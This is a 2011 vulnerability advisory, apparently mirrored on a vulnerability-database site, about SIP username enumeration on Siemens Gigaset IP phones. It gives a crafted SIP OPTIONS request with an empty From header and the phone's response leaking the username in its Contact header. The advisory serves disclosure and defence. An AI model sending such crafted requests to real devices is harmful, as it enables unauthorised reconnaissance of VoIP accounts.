`Siemens Gigaset ip series sip username enumeration
Author: francesco.tornieri \"At\" verona-wireless.net
Summary: Sip responses permit user identification
Release Date: 23/08/2011
Criticality level: Low
Impact: Information leak
Device: Siemens Gigaset IP series (Tested A580IP)
Description:
I've configured my own device in this way:
------------------------
Siemens Gigaset SIP Configuration Form
------------------------
IP: 192.168.1.253
Authentication Name: 500
Authentication Password: 500
Username: 500
Display Name: dect
Authentication Name and Username field have to be the same otherwise the device doesn't registers to the PBX.
It's possible to enumerate SIP username through use craft OPTIONS method, if you send an OPTIONS with a craft null "From" header (ex: From: <sip:@192.168.1.253:5060>) you obtain in response a "Contact" header that contains phone's username SIP field (ex:Contact: <sip:[email protected]:5060>).
------------------------
Craft Sip OPTIONS example
------------------------
OPTIONS sip:@192.168.1.253:5060 SIP/2.0
Via: SIP/2.0/UDP 192.168.1.253:5060;branch=z9hG4bK78adb2cd-0671-e011-81a1-a1816009ca7a;rport
Max-Forwards: 70
From: <sip:@192.168.1.253:5060>;tag=642d29cd-0671-e011-81a1-a1816009ca7a
To: <sip:[email protected]:5060>
Call-ID: d168fe2114a87ab560886720ab19392c
CSeq: 199 OPTIONS
User-Agent: FT
Content-Length: 0
Response:
---
Received: SIP/2.0 200 OK
Via: SIP/2.0/UDP 192.168.1.253:5060;branch=z9hG4bK78adb2cd-0671-e011-81a1-a1816009ca7a;rport=36675;received=192.168.1.1
From: <sip:192.168.1.253:5060>;tag=642d29cd-0671-e011-81a1-a1816009ca7a
To: <sip:[email protected]:5060>;tag=2470224496
Call-ID: 581bac10541a39c50df52ed2d88297ff
CSeq: 199 OPTIONS
Contact: <sip:[email protected]:5060> <----- 500 SIP Username field
...
---
Francesco Tornieri
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation